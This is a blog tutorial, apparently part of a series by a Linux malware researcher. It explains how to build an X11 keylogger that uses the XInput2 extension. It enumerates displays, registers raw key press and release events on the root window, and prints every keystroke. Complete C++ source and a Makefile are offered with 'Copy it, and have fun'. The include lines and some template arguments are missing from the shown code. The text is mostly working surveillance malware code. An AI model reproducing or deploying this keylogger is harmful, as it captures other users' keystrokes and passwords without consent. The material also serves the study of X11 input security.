24.Key Code
In Complete Guide to Keylogging in Linux: Part 1, we covered how a keylogger can be written for Linux, by reading events directly from keyboard device. Today, we will cover slightly different technique for keyboard event capture.

 Linux GUI Stack

 Unlike other OSes like Windows, GUI is not part of Linux OS itself. Instead, this is managed by a stack of different application, libraries and protocols. A generic stack looks something similar to this:

    +---------------+                                      +--------------+
    |   Display:2   |<--=---+                    +----=--->|   WxWidget   |-----+
    +---------------+       |                    |         +--------------+     |
                            |                    |                              |
    +---------------+       |                    |         +--------------+     |
    |   Display:1   |<--=---+                    +----=--->|      Qt      |-----+
    +---------------+       |                    |         +--------------+     |
                            |                    |                              |
    +---------------+       |                    |         +--------------+     |
    |   Display:0   |<--=---+                    +----=--->|     GTK+     |-----+
    +---------------+       |                    |         +--------------+     |
                            |                    |                              |
                            |                    |                              |
     update   +-------------+--+  ---=---> +-----+--------+   send data         |
    +------=--|    X Server    |           |     xlib     |<-------------=------+
    | screen  +----------------+  <--=---- +--------------+   ask to repaint
    |             ^
    |             | events
    |   +---------+----------------+
    +-->|       Linux Kernel       |
        +--------------------------+
 
Here, X server sits between GUI and OS; and is responsible for providing various primitives. It implements the "windows, icons, menus, pointer" paradigm, which is bread and butter of GUI system. The protocol understood by X server is network oriented (which means, you can draw screen on completely different system than on which application is running); and is extensible by design. The GUI toolkits like GTK, GTK+, Qt etc use various X server libraries (these wrap the protocol behind "user friendly" functions) to draw various controls provided by them. Applications then use these libraries to design their own UIs. Generally these applications will be running on some Desktop Environment (a desktop environment implement "traditional" desktop elements (launcher, wallpaper etc) and controls (e.g. drag and drop)).
 

X Server Terminology

 
Since X server uses non-intuitive terminology, let us go through some of them before proceeding further:
 
**display**: A "display" is just a X server somewhere.
 
**screen**: A "screen" is a virtual framebuffer associated with a "display". A display may have more than one screens.
 
**monitor**: This is your physical monitor where the framebuffer will be drawn. Generally, a screen will be mapped with one monitor; but that is not universally true. It is possible to have 2 monitors with same screen like in mirrored display; or to use two smaller monitors with one huge screen (where different parts of screen land on different monitors).
 
**root window**: This is window in which everything else will be drawn. This is root node of window tree.
 
**virtual core device**: X server will always have two virtual core devices: a mouse and a keyboard. These devices are not dependent upon presence of physical input device; and do not generate any independent events. These are also called master devices. These are designed to provide core events in a range that matches the Display resolution. At the same time, they also generate events that are in the device-specific resolution (if applicable). Clients that register for XInput Extension events, will receive events in this native resolution. Clients that open physical devices ("slave devices") directly and register for events do not receive core events. A slave device cannot generate core events.
 

Keylogging in X Server

The basic way of input capture can be summarised as below:
 
- Check if X server is running.
- Enumerate available displays.
- Open desired display.
- Check if XInputExtension is available.
- Set event mask to enable key press and key release events
- Read events from display in loop
 

Enumerating displays

 By convention, when X server is running, it will create socket files in `/tmp/.X11-unix/` for each display. The file names follow a common pattern of `X<digits>`, where `:<digits>` will be display name. We can enumerate this path, and try to open available displays to ensure that the socket files are indeed from X server.
 
The sample code for enumeration is as below:

std::vector<std::string> EnumerateDisplay()
{
  std::vector<std::string> displays;
 
  for (auto &p : std::filesystem::directory_iterator("/tmp/.X11-unix"))
  {
    std::string path = p.path().filename().string();
    std::string display_name = ":";
   
    if (path[0] != 'X') continue;
   
    path.erase(0, 1);
    display_name.append(path);
   
    Display *disp = XOpenDisplay(display_name.c_str());
    if (disp != NULL)
    {
      int count = XScreenCount(disp);
      printf("Display %s has %d screens\n",
        display_name.c_str(), count);

      int i;
      for (i=0; i<count; i++)
        printf(" %d: %dx%d\n",
          i, XDisplayWidth(disp, i), XDisplayHeight(disp, i));

      XCloseDisplay(disp);
     
      displays.push_back(display_name);
    }
  }
 
  return displays;
}
As you can see, we are enumerating screens and their dimensions for each detected display. If you run this, you will see output similar to:
 

Display :0 has 1 screens
 0: 1920x1080
 
Here, I have only one screen associated with display, which has dimension of 1920x1080.
 

Detecting XInputExtension 

We can use `XQueryExtension` to check if any given extension is available on selected display. Since extensions may change their behaviour in future, it is good idea to limit to specific versions, where we havve tested our code. In this example, we will stick to version 2.0 of XInputExtension.
 
The code snippet for the above is as below:
 

// Set up X
Display * disp = XOpenDisplay(hostname);
if (NULL == disp)
{
    std::cerr << "Cannot open X display: " << hostname << std::endl;
    exit(1);
}
 
// Test for XInput 2 extension
int xiOpcode, queryEvent, queryError;
if (! XQueryExtension(disp, "XInputExtension", &xiOpcode, &queryEvent, &queryError)) 
{
    std::cerr << "X Input extension not available" << std::endl;
    exit(2);
}
// Request XInput 2.0, guarding against changes in future versions
int major = 2, minor = 0;
int queryResult = XIQueryVersion(disp, &major, &minor);
if (queryResult == BadRequest) 
{
    std::cerr << "Need XI 2.0 support (got " << major << "." << minor << std::endl;
    exit(3);
}
else if (queryResult != Success) 
{
    std::cerr << "Internal error" << std::endl;
    exit(4);
}

Registering for events

 To get specific events from X server, we have to tell it which events we are interested in, by setting mask. The mask is defined as below:
 

typedef struct {
    int deviceid;
    int mask_len;
    unsigned char* mask;
} XIEventMask;
 
If deviceid is a valid device, the event mask is selected only for this device. If deviceid is XIAllDevices or XIAllMasterDevices, the event mask is selected for all devices or all master devices, respectively. The effective event mask is the bit-wise OR of the XIAllDevices, XIAllMasterDevices and the respective device's event mask.
 
The mask_len specifies the length of mask in bytes.
 
Mask is a binary mask in the form of (1 << event type).
 
The mask can be set as below:
 

Window root = DefaultRootWindow(disp);
 
XIEventMask m;
m.deviceid = XIAllMasterDevices;
m.mask_len = XIMaskLen(XI_LASTEVENT);
m.mask = (unsigned char*)calloc(m.mask_len, sizeof(char));
XISetMask(m.mask, XI_RawKeyPress);
XISetMask(m.mask, XI_RawKeyRelease);
 
XISelectEvents(disp, root, &m, 1);
XSync(disp, false);
free(m.mask);
 

Reading Events

 The event data comes in object of `XGenericEventCookie`, which is defined as below:
 

typedef struct {
    int type;
    unsigned long serial;
    Bool send_event;
    Display *display;
    int extension;
    int evtype;
    unsigned int cookie;
    void *data;
} XGenericEventCookie; 
 
For keyboard events, `type` will be _GenericEvent_, `extension` will be _xiOpcode_, `evtype` will be _XI_RawKeyRelease_ or _XI_RawKeyPress_, and `data` will point to object of `XIRawEvent`.
 
To read the events, we need to do the following in a loop:
 
- Take event using `XNextEvent()`
- Check that event is for intended event (by verifying the values of fields)
- Read the event data
 
The code for the loop is as below:
 

while (true) 
{
    XEvent event;
    XGenericEventCookie *cookie = (XGenericEventCookie*)&event.xcookie;
    XNextEvent(disp, &event);
 
    if (XGetEventData(disp, cookie) &&
            cookie->type == GenericEvent &&
            cookie->extension == xiOpcode) 
    {
        switch (cookie->evtype)
        {
            case XI_RawKeyRelease:
            case XI_RawKeyPress: 
            {
                XIRawEvent *ev = (XIRawEvent*)cookie->data;
 
                // Ask X what it calls that key
                KeySym s = XkbKeycodeToKeysym(disp, ev->detail, 0, 0);
                if (NoSymbol == s) continue;
                char *str = XKeysymToString(s);
                if (NULL == str) continue;
 
                std::cout << (cookie->evtype == XI_RawKeyPress ? "+" : "-") << str << " " << std::flush;
                break;
            }
        }
    }
}
 
If you compare this code with keylogger code in previous blog post, you will see that we don't have to map scan codes to actual keys on keyboards manually. We let X server do the heavy lifting of dealing with applicable keyboard layouts, and correct mapping of scan code to keys on current layout (something we did not bother handling in previous post, because this is headache).
 

Complete Code

 For sake of completeness, I am putting whole code here for you. Copy it, and have fun.
 

keylogger.cpp 


#include 
#include 

#include 

#include 
#include 
#include 
#include 
#include 
 
int printUsage(std::string application_name) 
{
    std::cout << "USAGE: " << application_name << " [-display ] [-enumerate] [-help]" << std::endl;
    std::cout << "display      target X display                   (default :0)" << std::endl;
    std::cout << "enumerate    enumerate all X11 displays" << std::endl;
    std::cout << "help         print this information and exit" << std::endl;
 
    exit(0);
}
 
std::vector EnumerateDisplay()
{
    std::vector displays;
    
    for (auto &p : std::filesystem::directory_iterator("/tmp/.X11-unix"))
    {
        std::string path = p.path().filename().string();
        std::string display_name = ":";
        
        if (path[0] != 'X') continue;
        
        path.erase(0, 1);
        display_name.append(path);
        
        Display *disp = XOpenDisplay(display_name.c_str());
        if (disp != NULL) 
        {
            int count = XScreenCount(disp);
            printf("Display %s has %d screens\n",
                display_name.c_str(), count);
 
            int i;
            for (i=0; i<count; i++)
                printf(" %d: %dx%d\n",
                    i, XDisplayWidth(disp, i), XDisplayHeight(disp, i));
 
            XCloseDisplay(disp);
            
            displays.push_back(display_name);
        }
    }
    
    return displays;
}
 
int main(int argc, char * argv[])
{
    const char * hostname    = ":0";
 
    // Get arguments
    for (int i = 1; i < argc; i++)
    {
        if      (!strcmp(argv[i], "-help"))
            printUsage(argv[0]);
        else if (!strcmp(argv[i], "-display"))  
            hostname    = argv[++i];
        else if (!strcmp(argv[i], "-enumerate"))
        {
            EnumerateDisplay();
            return 0;
        }
        else
        { 
            std::cerr << "Unknown argument: " << argv[i] << std::endl;
            printUsage(argv[0]); 
        }
    }
 
    // Set up X
    Display * disp = XOpenDisplay(hostname);
    if (NULL == disp)
    {
        std::cerr << "Cannot open X display: " << hostname << std::endl;
        exit(1);
    }
 
    // Test for XInput 2 extension
    int xiOpcode, queryEvent, queryError;
    if (! XQueryExtension(disp, "XInputExtension", &xiOpcode, &queryEvent, &queryError)) 
    {
        std::cerr << "X Input extension not available" << std::endl;
        exit(2);
    }
    { // Request XInput 2.0, guarding against changes in future versions
        int major = 2, minor = 0;
        int queryResult = XIQueryVersion(disp, &major, &minor);
        if (queryResult == BadRequest) 
        {
            std::cerr << "Need XI 2.0 support (got " << major << "." << minor << std::endl;
            exit(3);
        }
        else if (queryResult != Success) 
        {
            std::cerr << "Internal error" << std::endl;
            exit(4);
        }
    }
 
    // Register events
    Window root = DefaultRootWindow(disp);
    
    XIEventMask m;
    m.deviceid = XIAllMasterDevices;
    m.mask_len = XIMaskLen(XI_LASTEVENT);
    m.mask = (unsigned char*)calloc(m.mask_len, sizeof(char));
    XISetMask(m.mask, XI_RawKeyPress);
    XISetMask(m.mask, XI_RawKeyRelease);
    
    XISelectEvents(disp, root, &m, 1);
    XSync(disp, false);
    free(m.mask);
 
    while (true) 
    {
        XEvent event;
        XGenericEventCookie *cookie = (XGenericEventCookie*)&event.xcookie;
        XNextEvent(disp, &event);
 
        if (XGetEventData(disp, cookie) &&
                cookie->type == GenericEvent &&
                cookie->extension == xiOpcode) 
        {
            switch (cookie->evtype)
            {
                case XI_RawKeyRelease:
                case XI_RawKeyPress: 
                {
                    XIRawEvent *ev = (XIRawEvent*)cookie->data;
 
                    // Ask X what it calls that key
                    KeySym s = XkbKeycodeToKeysym(disp, ev->detail, 0, 0);
                    if (NoSymbol == s) continue;
                    char *str = XKeysymToString(s);
                    if (NULL == str) continue;
 
                    std::cout << (cookie->evtype == XI_RawKeyPress ? "+" : "-") << str << " " << std::flush;
                    break;
                }
            }
        }
    }
}
 

Makefile


keylogger: keylogger.cpp
$(CXX) --std=c++17 -pedantic -Wall -lX11 -lXi -o keylogger keylogger.cpp -O0 -ggdb
clean:
rm --force keylogger
Have fun, and stay tuned for Part 3 of this series coming soon!
 

About the Author

Adhokshaj Mishra works as a security researcher (malware - Linux) at Uptycs. His interest lies in offensive and defensive side of Linux malware research. He has been working on attacks related to containers, kubernetes; and various techniques to write better malware targeting Linux platform. In his free time, he loves to dabble into applied cryptography, and present his work in various security meetups and conferences.